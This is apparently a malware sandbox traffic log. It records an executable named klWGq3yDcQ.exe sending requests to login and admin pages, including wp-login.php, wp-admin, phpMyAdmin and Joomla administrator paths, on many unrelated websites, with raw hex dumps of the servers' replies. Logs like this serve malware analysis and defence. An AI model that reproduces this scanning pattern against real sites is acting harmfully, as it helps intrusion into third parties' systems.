                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC627INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 62 2d 37
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/wp-login.phpServer: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-b-7


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    221192.168.2.46070445.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC856INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC7882INData Raw: 31 65 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1ec2<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC593INData Raw: 32 34 61 0d 0a 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 75 74 69 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 2e 32 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 39 38 32 35 38 33 39 63 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72
                                                                                                                                                                                                    Data Ascii: 24aipt' src='https://engel-firm.com/wp-includes/js/wp-util.min.js?ver=6.3.2' id='wp-util-js'></script><script type='text/javascript' id='user-profile-js-extra'>/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"f49825839c"};/* ... */</scr
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    222192.168.2.46081134.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC175OUTGET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1079INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 38 2e 35 37 35 31 30 33 36 33 33 36 33 34 31 33 32 38 38 33 30 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978378.5751036336341328830Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC173INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                    Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65
                                                                                                                                                                                                    Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC188INData Raw: 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: egardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    223192.168.2.460835172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC644INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 70 68 70 4d 79 41 64 6d 69 6e 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/phpMyAdminCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC422INData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
                                                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    224192.168.2.46084654.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC215OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://ce-logic.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    225192.168.2.460673185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC241OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.grantstech.io/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC319INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:38 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    226192.168.2.46085134.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC230OUTGET /wp-admin HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.linkan-group.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1079INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 38 2e 36 36 35 31 30 33 35 39 34 39 35 33 34 34 31 35 31 39 31 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30
